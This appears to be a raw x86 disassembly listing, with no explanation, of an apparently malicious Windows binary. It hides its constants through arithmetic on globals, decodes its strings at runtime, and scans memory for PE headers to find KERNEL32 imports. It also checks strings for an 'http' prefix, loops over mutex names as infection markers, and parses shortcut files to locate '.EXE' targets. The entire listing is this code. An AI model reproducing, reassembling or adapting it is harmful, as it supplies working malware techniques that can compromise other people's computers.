var_10028 = dword ptr -10028h
var_10024 = dword ptr -10024h
var_10020 = byte ptr -10020h
var_10018 = dword ptr -10018h
var_10010 = dword ptr -10010h
var_1000C = dword ptr -1000Ch
var_10008 = dword ptr -10008h
var_10003 = byte ptr -10003h
var_10002 = byte ptr -10002h
var_10001 = byte ptr -10001h
var_10000 = byte ptr -10000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10034h
call sub_42507D
push ebx
push esi
push edi
cmp dword ptr ds:10012230h, 0
jnz short loc_41FE43
movsx eax, word ptr ds:100120F0h
add eax, 5
cmp ds:1000E61Ch, eax
jb loc_42007F
loc_41FE43: ; CODE XREF: sub_41FE14+17�j
lea eax, [ebp+var_10020]
push eax
call dword ptr ds:1000C038h
lea eax, [ebp+var_10030]
push eax
lea eax, [ebp+var_10020]
push eax
push 9
movsx eax, word ptr ds:100120E4h
add eax, ds:1001210Ch
sub eax, 9
push eax
push [ebp+arg_0]
call dword ptr ds:1000F254h
mov edi, eax
movsx eax, word ptr ds:10012120h
sub eax, 8
cmp edi, eax
jnz loc_42007F
mov esi, [ebp+var_10018]
and [ebp+var_1000C], 0
lea eax, [ebp+var_1000C]
push eax
push 10013900h
push esi
mov edx, [esi]
call dword ptr ds:0[edx]
mov edi, eax
movsx eax, word ptr ds:10012140h
add eax, ds:100120C4h
sub eax, 0Bh
cmp edi, eax
jnz loc_42007F
lea eax, [ebp+var_10024]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+78h]
mov edi, eax
mov eax, ds:100120BCh
dec eax
cmp edi, eax
jnz loc_420079
lea eax, [ebp+var_10003]
push eax
push [ebp+var_10024]
call sub_41CA6C
add esp, 8
mov edx, eax
inc edx
mov [ebp+var_10034], edx
push [ebp+var_10024]
call dword ptr ds:10011BA0h
cmp [ebp+var_10003], 68h
jnz short loc_41FF3C
cmp [ebp+var_10002], 74h
jnz short loc_41FF3C
cmp [ebp+var_10001], 74h
jnz short loc_41FF3C
cmp [ebp+var_10000], 70h
jz short loc_41FF41
loc_41FF3C: ; CODE XREF: sub_41FE14+10B�j
; sub_41FE14+114�j ...
jmp loc_420079
; ---------------------------------------------------------------------------
loc_41FF41: ; CODE XREF: sub_41FE14+126�j
lea eax, [ebp+var_10010]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov edi, eax
mov eax, ds:10012104h
sub eax, 2
cmp edi, eax
jnz loc_420079
lea eax, [ebp+var_4]
push eax
push 10013880h
mov eax, [ebp+var_10010]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov edi, eax
mov eax, ds:100120C8h
movsx edx, word ptr ds:1001212Ch
add eax, edx
sub eax, 8
cmp edi, eax
jnz loc_42006D
lea eax, [ebp+var_10008]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+1B0h]
mov edi, eax
mov eax, ds:10012104h
sub eax, 2
cmp edi, eax
jnz loc_420064
lea eax, [ebp+var_10028]
push eax
mov eax, [ebp+var_10008]
push eax
mov edx, [eax]
call dword ptr [edx+70h]
mov edi, eax
movsx eax, word ptr ds:100120E0h
movsx edx, word ptr ds:10012120h
add eax, edx
sub eax, 10h
cmp edi, eax
jz short loc_41FFF9
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
jmp short loc_420064
; ---------------------------------------------------------------------------
loc_41FFF9: ; CODE XREF: sub_41FE14+1D5�j
xor ebx, ebx
mov eax, [ebp+var_10028]
cmp [ebp+var_10008], eax
jz short loc_42000C
xor ebx, ebx
inc ebx
loc_42000C: ; CODE XREF: sub_41FE14+1F3�j
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
mov eax, [ebp+var_10028]
push eax
mov eax, [eax]
call dword ptr [eax+8]
or ebx, ebx
jnz short loc_420064
lea eax, [ebp+var_1002C]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov edi, eax
movsx eax, word ptr ds:100120F4h
cmp edi, eax
jnz short loc_420064
push [ebp+var_1002C]
push [ebp+var_4]
call nullsub_1
push [ebp+var_1002C]
push [ebp+var_4]
call sub_4242AF
add esp, 10h
loc_420064: ; CODE XREF: sub_41FE14+1A5�j
; sub_41FE14+1E3�j ...
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_42006D: ; CODE XREF: sub_41FE14+180�j
mov eax, [ebp+var_10010]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_420079: ; CODE XREF: sub_41FE14+D4�j
; sub_41FE14:loc_41FF3C�j ...
push esi
mov eax, [esi]
call dword ptr [eax+8]
loc_42007F: ; CODE XREF: sub_41FE14+29�j
; sub_41FE14+74�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41FE14 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
push edi
lea eax, ds:10006328h
mov [ebp-10h], eax
mov edx, eax
mov ecx, ds:10012104h
add ecx, 0Ah
movsx eax, word ptr ds:1001212Ch
add ecx, eax
mov eax, edx
shr eax, cl
mov edx, ds:100120C0h
add edx, 0Dh
mov ecx, edx
mov ebx, eax
shl ebx, cl
loc_4200C0: ; CODE XREF: .data:004200DE�j
; .data:0042010A�j ...
mov [ebp-18h], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_4200E0
mov eax, ds:1001209Ch
add eax, 0FFFBh
add eax, ds:10012124h
sub ebx, eax
jmp short loc_4200C0
; ---------------------------------------------------------------------------
loc_4200E0: ; CODE XREF: .data:004200CA�j
movsx eax, word ptr ds:100120CCh
add eax, 35h
mov esi, ebx
add esi, eax
mov eax, ebx
add eax, [esi]
mov [ebp-14h], eax
mov ecx, [ebp-10h]
cmp eax, ecx
jbe short loc_42010C
movsx eax, word ptr ds:10012118h
add eax, 0FFF7h
sub ebx, eax
jmp short loc_4200C0
; ---------------------------------------------------------------------------
loc_42010C: ; CODE XREF: .data:004200FA�j
mov eax, [ebp-14h]
mov [ebp-8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_420130
mov eax, ds:10012110h
add eax, 0FFF4h
add eax, ds:100120C4h
sub ebx, eax
jmp short loc_4200C0
; ---------------------------------------------------------------------------
loc_420130: ; CODE XREF: .data:0042011A�j
mov eax, [ebp-8]
mov eax, [eax+80h]
mov [ebp-0Ch], eax
movsx eax, word ptr ds:10012120h
add eax, ds:100120D0h
sub eax, 8
mov [ebp-4], eax
jmp loc_4202DD
; ---------------------------------------------------------------------------
loc_420154: ; CODE XREF: .data:004202E9�j
mov eax, ebx
add eax, [ebp-0Ch]
add eax, [ebp-4]
mov [ebp-12Ch], eax
mov edx, ds:10012100h
sub edx, 3
cmp [eax], edx
jz loc_4202EF
mov eax, [ebp-12Ch]
mov edx, ebx
add edx, [eax+0Ch]
mov [ebp-130h], edx
push edx
lea eax, [ebp-127h]
push eax
call sub_42509D
mov eax, ds:10012144h
mov [ebp-28h], eax
jmp short loc_4201BD
; ---------------------------------------------------------------------------
loc_42019B: ; CODE XREF: .data:004201D4�j
mov eax, [ebp-28h]
mov al, [ebp+eax-127h]
cmp al, 61h
jle short loc_4201BA
cmp al, 7Ah
jge short loc_4201BA
mov eax, [ebp-28h]
lea eax, [ebp+eax-127h]
sub byte ptr [eax], 20h
loc_4201BA: ; CODE XREF: .data:004201A7�j
; .data:004201AB�j
inc dword ptr [ebp-28h]
loc_4201BD: ; CODE XREF: .data:00420199�j
mov eax, [ebp-28h]
movsx eax, byte ptr [ebp+eax-127h]
movsx edx, word ptr ds:1001213Ch
sub edx, 7
cmp eax, edx
jnz short loc_42019B
movsx eax, word ptr ds:100120E4h
cmp byte ptr [ebp+eax-12Dh], 4Bh
jnz loc_4202D9
mov eax, ds:10012134h
add eax, ds:100120BCh
cmp byte ptr [ebp+eax-12Bh], 45h
jnz loc_4202D9
movsx eax, word ptr ds:10012120h
cmp byte ptr [ebp+eax-12Dh], 52h
jnz loc_4202D9
movsx eax, word ptr ds:10012118h
movsx edx, word ptr ds:10012140h
add eax, edx
cmp byte ptr [ebp+eax-132h], 4Ch
jnz loc_4202D9
movsx eax, word ptr ds:100120A0h
movsx edx, word ptr ds:100120CCh
add eax, edx
cmp byte ptr [ebp+eax-12Dh], 33h
jnz loc_4202D9
mov eax, ds:100120C8h
add eax, ds:100120C0h
cmp byte ptr [ebp+eax-127h], 32h
jnz short loc_4202D9
mov eax, [ebp-12Ch]
mov edx, ebx
add edx, [eax+10h]
mov [ebp-138h], edx
mov eax, ds:10012138h
sub eax, 2
mov [ebp-134h], eax
loc_420289: ; CODE XREF: .data:004202D5�j
mov eax, [ebp-138h]
mov esi, eax
add esi, [ebp-134h]
mov edi, [esi]
mov eax, ds:100120C4h
movsx edx, word ptr ds:1001213Ch
add eax, edx
sub eax, 0Bh
cmp edi, eax
jz short loc_4202EF
push edi
call sub_41D9C2
pop ecx
cmp dword ptr ds:10012154h, 0
jnz short loc_4202EF
mov eax, ds:10012094h
add eax, 2
movsx edx, word ptr ds:100120B8h
add eax, edx
add [ebp-134h], eax
jmp short loc_420289
; ---------------------------------------------------------------------------
db 0EBh
db 16h
; ---------------------------------------------------------------------------
loc_4202D9: ; CODE XREF: .data:004201E5�j
; .data:004201FE�j ...
add dword ptr [ebp-4], 14h
loc_4202DD: ; CODE XREF: .data:0042014F�j
mov eax, [ebp-8]
mov eax, [eax+84h]
cmp [ebp-4], eax
jb loc_420154
loc_4202EF: ; CODE XREF: .data:0042016D�j
; .data:004202AC�j ...
cmp dword ptr ds:10012154h, 0
jz short loc_420344
call sub_422780
call sub_41FA23
call sub_420587
mov edx, eax
mov [ebp-19h], dl
movzx eax, byte ptr [ebp-19h]
mov edx, ds:100120D8h
dec edx
cmp eax, edx
jz short loc_420344
lea eax, [ebp-24h]
push eax
mov eax, ds:100120F8h
sub eax, 7
push eax
lea eax, [ebp-20h]
push eax
push 10006328h
movsx eax, word ptr ds:10012140h
sub eax, 7
push eax
push 0
call dword ptr ds:10011B90h
loc_420344: ; CODE XREF: .data:004202F6�j
; .data:00420319�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_420349 proc near ; CODE XREF: .data:0041F75F�p
push edi
push 1001338Bh
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:10012174h, eax
test eax, eax
jnz short loc_42037C
push 1001337Ch
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:10012174h, eax
loc_42037C: ; CODE XREF: sub_420349+1A�j
push 10013368h
call sub_41E33D
pop ecx
push eax
push dword ptr ds:10012174h
call dword ptr ds:1000E1F8h
mov ds:1000EA44h, eax
pop edi
retn
sub_420349 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42039B proc near ; CODE XREF: sub_420BEA+C4�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 8000h
mov eax, ds:10012110h
sub eax, 8
push eax
push [ebp+arg_0]
call dword ptr ds:10010630h
pop ebp
retn
sub_42039B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov eax, [ebp+18h]
mov [ebp+18h], ax
movsx eax, word ptr ds:100120B4h
add eax, 0C3h
cmp [ebp+0Ch], eax
jnz loc_4204F7
mov word ptr [ebp-18h], 3
lea eax, [ebp-10h]
push eax
mov eax, ds:10012254h
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov [ebp-4], eax
mov eax, ds:100120E8h
movsx edx, word ptr ds:100120B8h
add eax, edx
sub eax, 8
cmp [ebp-4], eax
jnz loc_4204F3
dec dword ptr [ebp-10h]
lea eax, [ebp-1Ch]
push eax
lea esi, [ebp-18h]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, ds:10012254h
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov [ebp-4], eax
mov eax, ds:10012128h
add eax, ds:100120D0h
cmp [ebp-4], eax
jnz loc_4204F3
lea eax, [ebp-20h]
push eax
push 10013900h
mov eax, [ebp-1Ch]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp-4], eax
movsx eax, word ptr ds:1001212Ch
movsx edx, word ptr ds:10012118h
add eax, edx
sub eax, 0Dh
cmp [ebp-4], eax
jnz short loc_4204EA
lea eax, ds:10012250h
mov [ebp-8], eax
push eax
mov ebx, [eax]
call dword ptr [ebx+4]
lea eax, [ebp-24h]
push eax
push 10013840h
mov eax, [ebp-8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp-4], eax
movsx eax, word ptr ds:10012130h
add eax, ds:10012134h
sub eax, 8
cmp [ebp-4], eax
jnz short loc_4204D8
lea eax, [ebp-2Ch]
push eax
push 10013840h
push dword ptr [ebp-24h]
push dword ptr [ebp-20h]
call sub_41CDDB
add esp, 10h
mov [ebp-28h], eax
mov eax, [ebp-24h]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_4204D8: ; CODE XREF: .data:004204B3�j
mov eax, [ebp-8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, [ebp-20h]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_4204EA: ; CODE XREF: .data:00420476�j
mov eax, [ebp-1Ch]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_4204F3: ; CODE XREF: .data:00420408�j
; .data:00420441�j
xor eax, eax
jmp short loc_4204FC
; ---------------------------------------------------------------------------
loc_4204F7: ; CODE XREF: .data:004203D6�j
mov eax, 80020003h
loc_4204FC: ; CODE XREF: .data:004204F5�j
pop edi
pop esi
pop ebx
leave
retn 24h
; =============== S U B R O U T I N E =======================================
sub_420503 proc near ; CODE XREF: .data:0041F755�p
push edi
push 1001335Dh
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:1001216Ch, eax
test eax, eax
jnz short loc_420536
push 10013352h
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:1001216Ch, eax
loc_420536: ; CODE XREF: sub_420503+1A�j
cmp dword ptr ds:1001216Ch, 0
jz short loc_42055C
push 1001333Ch
call sub_41E33D
pop ecx
push eax
push dword ptr ds:1001216Ch
call dword ptr ds:1000E1F8h
mov ds:1000E600h, eax
loc_42055C: ; CODE XREF: sub_420503+3A�j
pop edi
retn
sub_420503 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
movsx eax, word ptr ds:100120B4h
sub eax, 5
cmp ds:10011BA8h, eax
jbe short loc_42057E
push 10011BA8h
call dword ptr ds:1000C010h
loc_42057E: ; CODE XREF: .data:00420571�j
mov eax, ds:10011BA8h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420587 proc near ; CODE XREF: .data:loc_41F769�p
; .data:00420302�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 108h
push ebx
push esi
push edi
mov edi, ds:10012124h
dec edi
jmp loc_42062B
; ---------------------------------------------------------------------------
loc_42059F: ; CODE XREF: sub_420587+B0�j
push 10013330h
call sub_41E33D
mov [ebp+var_108], eax
push 10013326h
call sub_41E33D
mov esi, ds:100120F8h
movsx ebx, word ptr ds:10012114h
add esi, ebx
sub esi, 9
push esi
push eax
mov esi, [ebp+var_108]
push esi
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10011634h
add esp, 18h
lea eax, [ebp+var_FF]
push eax
push 0
push 1F0001h
call dword ptr ds:10010644h
mov [ebp+var_104], eax
or eax, eax
jz short loc_42062A
push eax
call dword ptr ds:10010650h
mov eax, ds:10012100h
movsx edx, word ptr ds:10012120h
add eax, edx
sub eax, 0Ah
cmp edi, eax
jnz short loc_420623
xor eax, eax
inc eax
jmp short loc_42063F
; ---------------------------------------------------------------------------
loc_420623: ; CODE XREF: sub_420587+95�j
mov eax, 2
jmp short loc_42063F
; ---------------------------------------------------------------------------
loc_42062A: ; CODE XREF: sub_420587+79�j
inc edi
loc_42062B: ; CODE XREF: sub_420587+13�j
movsx eax, word ptr ds:100120B8h
add eax, 62h
cmp edi, eax
jb loc_42059F
xor eax, eax
loc_42063F: ; CODE XREF: sub_420587+9A�j
; sub_420587+A1�j
pop edi
pop esi
pop ebx
leave
retn
sub_420587 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
pusha
mov esi, [ebp+10h]
mov eax, 10008DF8h
mov [esi+0B8h], eax
mov eax, [ebp+0Ch]
mov [esi+0C4h], eax
popa
mov esp, ebp
pop ebp
xor eax, eax
retn
; ---------------------------------------------------------------------------
db 0C3h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, ds:100120C8h
sub eax, 4
cmp ds:1000E604h, eax
jbe short loc_420685
push 1000E604h
call dword ptr ds:1000C010h
loc_420685: ; CODE XREF: .data:00420678�j
mov eax, ds:1000E604h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_42068E proc near ; CODE XREF: .data:0041F746�p
push edi
push 10013319h
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:10012160h, eax
test eax, eax
jnz short loc_4206C1
push 1001330Ch
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:10012160h, eax
loc_4206C1: ; CODE XREF: sub_42068E+1A�j
push 100132FDh
call sub_41E33D
push eax
push dword ptr ds:10012160h
call dword ptr ds:1000E1F8h
mov ds:1000F250h, eax
push 100132EBh
call sub_41E33D
add esp, 8
push eax
push dword ptr ds:10012160h
call dword ptr ds:1000E1F8h
mov ds:1000D120h, eax
pop edi
retn
sub_42068E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4206FE proc near ; CODE XREF: sub_41D704+1B3�p
; sub_41D704+231�p ...
var_EF38 = dword ptr -0EF38h
var_EF34 = dword ptr -0EF34h
var_EF30 = dword ptr -0EF30h
var_EF2C = byte ptr -0EF2Ch
var_EF2B = byte ptr -0EF2Bh
var_EE2C = dword ptr -0EE2Ch
var_EE24 = byte ptr -0EE24h
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 0EF38h
call sub_42507D
push ebx
push esi
push edi
movsx edi, word ptr ds:1001214Ch
movsx esi, word ptr ds:10012130h
add edi, esi
imul edi, 3C0h
sub edi, 1680h
mov esi, ds:10012110h
add esi, 0EA58h
add edi, esi
shl edi, 1
mov [ebp+var_EF38], edi
push edi
call sub_425002
add esp, 4
mov [ebp+var_EE2C], eax
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:100120F0h
add edx, ds:10012138h
sub edx, 6
cmp eax, edx
jnz short loc_42078A
push 100132E0h
call sub_41E33D
add esp, 4
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10011634h
add esp, 8
jmp loc_420884
; ---------------------------------------------------------------------------
loc_42078A: ; CODE XREF: sub_4206FE+67�j
call dword ptr ds:1000F228h
mov ebx, eax
mov [ebp+var_EF2C], bl
movzx eax, [ebp+arg_0]
mov edx, ds:10012094h
inc edx
add edx, ds:100120BCh
cmp eax, edx
jnz short loc_4207FE
movsx eax, word ptr ds:100120CCh
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push [ebp+arg_8]
call sub_41C88D
add esp, 0Ch
push 100132B0h
call sub_41E33D
add esp, 4
movzx edi, [ebp+var_EF2C]
push edi
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10011634h
add esp, 10h
jmp loc_420884
; ---------------------------------------------------------------------------
loc_4207FE: ; CODE XREF: sub_4206FE+AD�j
movsx eax, word ptr ds:10012108h
sub eax, 5
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push dword ptr ds:10012230h
call sub_41C88D
add esp, 0Ch
push 10013252h
call sub_41E33D
add esp, 4
mov edi, [ebp+arg_18]
mov esi, [ebp+arg_8]
mov ebx, edi
add ebx, esi
push ebx
push [ebp+arg_1C]
push edi
push [ebp+arg_14]
movzx edi, [ebp+var_EF2C]
push edi
mov edi, esi
sub edi, [ebp+arg_C]
mov esi, ds:1001210Ch
add esi, ds:100120C4h
sub esi, 3
sub edi, esi
push edi
push 1000F230h
push [ebp+arg_10]
push [ebp+arg_20]
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10011634h
add esp, 30h
loc_420884: ; CODE XREF: sub_4206FE+87�j
; sub_4206FE+FB�j
push [ebp+var_EF38]
push [ebp+var_EE2C]
movsx eax, word ptr ds:10012120h
add eax, ds:10012094h
sub eax, 7
neg eax
push eax
lea eax, [ebp+var_EE24]
push eax
mov eax, ds:1001210Ch
add eax, ds:10012098h
sub eax, 8
push eax
push 0
call dword ptr ds:1001163Ch
push 10013238h
call sub_422C45
add esp, 4
push eax
call dword ptr ds:1000C044h
mov [ebp+var_EF30], eax
push [ebp+var_EE2C]
call dword ptr ds:1000C044h
mov [ebp+var_EF34], eax
push eax
push [ebp+var_EF30]
mov eax, [ebp+arg_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+104h]
push [ebp+var_EF34]
call dword ptr ds:10011BA0h
push [ebp+var_EF30]
call dword ptr ds:10011BA0h
lea esp, [ebp-0EF44h]
pop edi
pop esi
pop ebx
leave
retn
sub_4206FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420923 proc near ; CODE XREF: sub_41C388+18B�p
var_12110 = byte ptr -12110h
var_1210C = word ptr -1210Ch
var_1210A = word ptr -1210Ah
var_12108 = dword ptr -12108h
var_12104 = byte ptr -12104h
var_12000 = word ptr -12000h
var_11FFE = byte ptr -11FFEh
var_1FFF = byte ptr -1FFFh
var_1FB3 = byte ptr -1FB3h
var_1FB2 = byte ptr -1FB2h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 12110h
call sub_42507D
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12104]
push eax
call sub_42509D
lea ecx, [ebp+var_12104]
or eax, 0FFFFFFFFh
loc_42094B: ; CODE XREF: sub_420923+2D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_42094B
mov ebx, ds:10012128h
add ebx, 1
mov esi, eax
sub esi, ebx
mov ebx, ds:100120DCh
sub ebx, 8
mov [ebp+esi+var_12104], bl
push 0
movsx eax, word ptr ds:10012090h
sub eax, 2
push eax
push 3
push 0
movsx eax, word ptr ds:100120A0h
sub eax, 5
push eax
push 80000001h
lea eax, [ebp+var_12104]
push eax
call dword ptr ds:10011788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_420BE5
push 0
lea eax, [ebp+var_12110]
push eax
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push edi
call dword ptr ds:1000C028h
mov [ebp+var_12108], eax
push edi
call dword ptr ds:10010650h
mov eax, ds:100120ACh
add eax, ds:10012094h
sub eax, 2
cmp [ebp+var_12108], eax
jz loc_420BE5
cmp [ebp+var_1FFF], 4Ch
jnz loc_420BE5
movzx esi, [ebp+var_1FB3]
movzx ebx, [ebp+var_1FB2]
movzx ebx, bx
shl ebx, 8
or esi, ebx
mov [ebp+var_1210A], si
movzx eax, [ebp+var_1210A]
movsx edx, word ptr ds:10012118h
lea eax, [eax+edx+43h]
add eax, ds:10012104h
mov [ebp+var_12000], ax
movzx eax, [ebp+var_12000]
movsx eax, [ebp+eax+var_1FFF]
movsx edx, word ptr ds:100120A4h
movsx ecx, word ptr ds:100120F4h
add edx, ecx
sub edx, 5
cmp eax, edx
jz loc_420BE5
movzx eax, [ebp+var_12000]
mov edx, ds:10012134h
add edx, 4
add edx, ds:10012094h
add eax, edx
movsx eax, [ebp+eax+var_1FFF]
movsx edx, word ptr ds:1001213Ch
sub edx, 6
cmp eax, edx
jnz loc_420BE5
movzx eax, [ebp+var_12000]
mov edx, ds:100120ACh
add edx, 0Ah
add edx, ds:100120A8h
mov ecx, eax
add ecx, edx
movzx edx, [ebp+ecx+var_1FFF]
mov esi, ds:10012138h
add esi, 7
movsx ebx, word ptr ds:10012120h
add esi, ebx
mov ebx, eax
add ebx, esi
movzx esi, [ebp+ebx+var_1FFF]
movzx esi, si
shl esi, 8
mov ebx, edx
or ebx, esi
mov esi, ebx
movzx esi, si
mov ebx, eax
add ebx, esi
mov esi, ebx
mov [ebp+var_1210C], si
movzx eax, [ebp+var_1210C]
lea eax, [ebp+eax+var_1FFF]
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_42509D
lea ecx, [ebp+var_11FFE]
or eax, 0FFFFFFFFh
loc_420B10: ; CODE XREF: sub_420923+1F2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_420B10
mov edi, eax
mov eax, ds:100120DCh
movsx edx, word ptr ds:100120F4h
add eax, edx
sub eax, 4
mov edx, edi
sub edx, eax
cmp [ebp+edx+var_11FFE], 2Eh
jnz short loc_420BAB
mov eax, ds:100120D0h
add eax, ds:100120F8h
sub eax, 4
mov edx, edi
sub edx, eax
movsx eax, [ebp+edx+var_11FFE]
push eax
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 45h
jnz short loc_420BAB
movsx esi, word ptr ds:100120B4h
sub esi, 3
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 58h
jnz short loc_420BAB
movsx esi, word ptr ds:10012118h
sub esi, 8
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call dword ptr ds:1000C030h
add esp, 4
cmp eax, 45h
jz short loc_420BAD
loc_420BAB: ; CODE XREF: sub_420923+213�j
; sub_420923+23C�j ...
jmp short loc_420BE5
; ---------------------------------------------------------------------------
loc_420BAD: ; CODE XREF: sub_420923+286�j
push 10013232h
call sub_41E33D
push eax
lea edi, [ebp+var_11FFE]
push edi
call dword ptr ds:1000C020h
movsx eax, word ptr ds:100120A0h
add eax, ds:10012104h
sub eax, 7
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_41BB32
add esp, 14h
loc_420BE5: ; CODE XREF: sub_420923+7F�j
; sub_420923+C2�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_420923 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420BEA proc near ; CODE XREF: sub_41BEF1+26F�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_420C01
add eax, 3Fh
loc_420C01: ; CODE XREF: sub_420BEA+12�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_41A8F9
pop ecx
mov [ebp+var_14], eax
mov edi, [ebp+arg_4]
mov edx, ds:10012110h
add edx, 34h
movsx ecx, word ptr ds:10012130h
add edx, ecx
mov eax, edi
add eax, edx
jge short loc_420C31
add eax, 3Fh
loc_420C31: ; CODE XREF: sub_420BEA+42�j
sar eax, 6
mov edi, ds:100120D8h
add edi, 3Dh
mov edx, eax
imul edx, edi
push edx
push [ebp+var_14]
call dword ptr ds:1000C02Ch
push [ebp+arg_4]
push esi
push [ebp+var_14]
call dword ptr ds:10010634h
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call sub_424773
mov esi, [ebp+var_14]
mov ebx, ds:100120ACh
sub ebx, 2
jmp short loc_420C89
; ---------------------------------------------------------------------------
loc_420C73: ; CODE XREF: sub_420BEA+BF�j
push esi
lea eax, [ebp+var_10]
push eax
call sub_42479A
movsx eax, word ptr ds:10012118h
lea esi, [eax+esi+37h]
inc ebx
loc_420C89: ; CODE XREF: sub_420BEA+87�j
mov edi, [ebp+arg_4]
mov edx, ds:100120E8h
add edx, 32h
add edx, ds:100120DCh
mov eax, edi
add eax, edx
jge short loc_420CA4
add eax, 3Fh
loc_420CA4: ; CODE XREF: sub_420BEA+B5�j
sar eax, 6
cmp ebx, eax
jl short loc_420C73
push [ebp+var_14]
call sub_42039B
lea eax, [ebp+var_54]
push eax
push [ebp+arg_8]
call sub_4221EB
movsx eax, word ptr ds:100120B8h
mov edx, ds:10012104h
lea eax, [eax+edx+0Ch]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
call dword ptr ds:10011648h
add esp, 18h
cmp eax, ds:100120ECh
jz short loc_420CEF
xor eax, eax
inc eax
jmp short loc_420CF1
; ---------------------------------------------------------------------------
loc_420CEF: ; CODE XREF: sub_420BEA+FE�j
xor eax, eax
loc_420CF1: ; CODE XREF: sub_420BEA+103�j
pop edi
pop esi
pop ebx
leave
retn
sub_420BEA endp
; ---------------------------------------------------------------------------
dw 1B8h
dd 0C2800040h
db 18h, 0
; =============== S U B R O U T I N E =======================================
sub_420CFE proc near ; CODE XREF: .data:0041F74B�p
push edi
push 10013225h
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000E5E8h
mov ds:10012164h, eax
test eax, eax
jnz short loc_420D31
push 10013218h
call sub_41E33D
pop ecx
push eax
call dword ptr ds:1000F244h
mov ds:10012164h, eax
loc_420D31: ; CODE XREF: sub_420CFE+1A�j
push 10013205h
